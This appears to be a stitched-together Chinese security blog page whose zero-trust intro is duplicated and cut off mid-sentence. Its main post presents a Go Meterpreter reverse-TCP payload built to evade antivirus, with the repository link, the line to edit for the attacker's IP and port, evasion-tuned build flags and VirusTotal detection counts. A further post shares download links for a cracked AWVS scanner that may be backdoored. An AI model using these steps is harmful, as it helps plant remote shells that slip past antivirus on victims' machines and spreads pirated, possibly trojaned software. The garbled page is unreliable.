我也来喷一喷零信任
- 2019年12月26日 11:29
零信任安全架构的核心就是 Never Trust, Always Verify。
说白了就是针对身份实体的请求上下文做一个综合判断,最后给出allow或者deny的结论,可玩的点还是在
零信任安全架构的核心就是 Never Trust, Always Verify。
说白了就是针对身份实体的请求上下文做一个综合判断,最后给出allow或者deny的结论,可玩的点还是在
Golang实现的x86下的Meterpreter reverse tcp。地址:https://github.com/insightglacier/go_meterpreter
做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。
使用方法修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。
set GOARCH=386 go build -ldflags="-H windowsgui -w"注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。
由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。
免杀效果加入了Bypass AV的代码。
我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。
今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀,刚写的时候效果好,但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。
在使用这个的过程中,Windows10中自带的杀毒软件会拦截。会被动态行为发现。这里仅是过静态查杀测试。
今天看到有群里分享Acunetix Web Vulnerability Scanner(AWVS)13的破解版本,这里分享一下~
Windows下载地址:
https://pan.baidu.com/s/10y_nGpe-rLHqRoyB4Hz3BQ
Linux 下载地址:
https://mega.nz/#!JAxkRQgB!RcaAd5-zHKTNQHD28YcAocKB4RVoNDrOZRnL5bCLj0g
官网介绍地址
https://www.acunetix.com/vulnerability-scanner/
注:工具来源于网络,请自行验证是否存在后门等情况,为了安全考虑建议使用虚拟机运行。